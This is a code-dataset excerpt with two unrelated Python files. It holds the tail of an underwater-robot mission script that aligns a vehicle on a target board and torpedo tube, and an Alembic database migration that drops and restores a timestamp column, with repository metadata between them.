TargetCutout(deadband),
AlignSurge(cutout.board_func, width),
finite=False,
), success=6, total=8)
if cutout.is_noodle:
target_cutout = Sequential(
Log('Aligning in front of covered cutout'),
MoveClose(self.SEAWEED_TARGET_BOARD_WIDTH, 0.04),
)
else:
target_cutout = Sequential(
Log('Aligning halfway to uncovered cutout'),
MoveClose(self.NORMAL_TARGET_BOARD_HALF_WIDTH, 0.07),
Log('Aligning close to uncovered cutout'),
MoveClose(self.NORMAL_TARGET_BOARD_WIDTH, 0.07),
)
self.task = Sequential(
Log('Aligning board containing cutout'),
AlignBoards(lambda: [cutout.board_func()]),
Log('Centering cutout'),
TargetCutout(0.15),
target_cutout,
Zero(),
FunctionTask(unsee_cutout),
Sequential(
Log('Moving poker beside seaweed'),
NavigationSpeed(
MoveX(self.ALIGN_POKER_DISTANCE, deadband=0.02),
0.3,
),
) if cutout.is_noodle else NoOp(),
Log('Aligning torpedo tube'),
torp.AlignFromForecam(),
)
def on_run(self, cutout, torp, *args, **kwargs):
if self.must_see_cutout and cutout.board_func() is None:
self.loge('Cutout lost, cannot align')
self.finish(success=False)
else:
self.task()
if self.task.finished:
self.finish(success=self.task.success)
class VisionTask(Task):
def on_first_run(self, task_func, *args, **kwargs):
vision = Vision()
self.use_task(MasterConcurrent(task_func(vision, *args, **kwargs), vision))
def Full(): return VisionTask(Torpedoes)
| 30.421951
| 105
| 0.570833
|
c4934d3dff4073a9d9c15e6c4f3428702f360f94
| 735
|
py
|
Python
|
migrations/versions/bc7876f81064_.py
|
hkjayakumar/ghost-server
|
5ecbf57e4c02fba2517161e36b0fb51410e5969b
|
[
"MIT"
] | 1
|
2020-10-17T23:42:32.000Z
|
2020-10-17T23:42:32.000Z
|
migrations/versions/bc7876f81064_.py
|
hkjayakumar/ghost-server
|
5ecbf57e4c02fba2517161e36b0fb51410e5969b
|
[
"MIT"
] | null | null | null |
migrations/versions/bc7876f81064_.py
|
hkjayakumar/ghost-server
|
5ecbf57e4c02fba2517161e36b0fb51410e5969b
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: bc7876f81064
Revises: 891fd177041d
Create Date: 2017-08-08 00:21:23.137849
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'bc7876f81064'
down_revision = '891fd177041d'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('messages', 'timestamp')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('messages', sa.Column('timestamp', postgresql.TIMESTAMP(), autoincrement=False, nullable=True))
# ### end Alembic commands ###
| 25.344828
| 113
| 0.715646
|